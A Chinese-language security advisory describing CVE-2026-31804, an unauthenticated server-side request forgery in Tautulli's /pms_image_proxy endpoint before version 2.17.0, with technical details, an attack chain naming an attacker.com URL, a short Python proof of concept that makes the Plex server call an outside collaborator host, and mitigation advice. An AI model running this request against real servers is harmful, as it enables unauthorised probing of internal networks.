CVE-2026-31804 CVSS 4.0 中危

CVE-2026-31804 Tautulli SSRF漏洞

披露日期: 2026-03-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-31804

漏洞类型

SSRF (服务器端请求伪造)

CVSS评分

4.0 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Tautulli

漏洞概述

Tautulli是一款基于Python的Plex媒体服务器监控工具。在2.17.0版本之前，其/pms_image_proxy端点存在安全漏洞。该端点未经身份验证，且未对用户提供的img参数进行scheme或host限制，直接将其转发给Plex媒体服务器的转码器。攻击者可利用此漏洞诱导Plex服务器向任意URL发起请求，从而探测内网服务或进行SSRF攻击。该问题已在2.17.0版本中修复。

技术细节

该漏洞位于Tautulli的`/pms_image_proxy`接口中。根据源码分析，该接口在`webstart.py`中被特意排除在认证检查之外。当用户传入以`http`开头的`img`参数时，系统未对该参数进行严格的地址或协议过滤，直接将其传递给后端的Plex Media Server的`/photo/:/transcode`转码器接口。由于Plex Media Server通常与Tautulli运行在同一主机或同一内网环境中，拥有访问RFC-1918地址空间的权限。攻击者通过构造恶意的`img`参数（如指向内网IP或端口的URL），可诱导Plex进程发起出站HTTP请求。这构成了典型的服务端请求伪造（SSRF），允许攻击者扫描内网端口、读取本地元数据或利用Plex的其他功能。

攻击链分析

STEP 1

1. 侦察

攻击者识别出目标运行的是Tautulli应用，且版本低于2.17.0。

STEP 2

2. 漏洞利用

攻击者向`/pms_image_proxy`端点发送特制的HTTP GET请求，参数`img`被设置为攻击者控制的URL（如`http://attacker.com/poc`）。

STEP 3

3. 后端转发

Tautulli服务器接收请求，绕过认证检查，并将`img`参数直接传递给本地或内网的Plex Media Server转码器。

STEP 4

4. 发起请求

Plex Media Server进程解析参数，向攻击者指定的URL发起出站HTTP请求。

STEP 5

5. 达成效果

攻击者通过观察服务器日志或DNS交互，确认SSRF漏洞利用成功，并可进一步利用该能力扫描内网。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC code for CVE-2026-31804
import requests

target_url = "http://localhost:8181"  # Replace with Tautulli URL
# Attacker controlled URL to verify outbound request (e.g., Burp Collaborator)
attacker_url = "http://burpcollaborator.net"

# Exploit endpoint
exploit_endpoint = f"{target_url}/pms_image_proxy"

# Payload
params = {
    "img": attacker_url
}

try:
    # Send request without authentication
    response = requests.get(exploit_endpoint, params=params, timeout=10)
    print(f"Request sent to {exploit_endpoint}")
    print(f"Check {attacker_url} for DNS/HTTP interactions")
except Exception as e:
    print(f"Error: {e}")

影响范围

Tautulli < 2.17.0

防御指南

临时缓解措施

如果无法立即升级，建议通过网络访问控制列表（ACL）限制对Tautulli服务器的访问，仅允许可信IP访问，或在反向代理层面过滤包含外部URL的请求参数。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表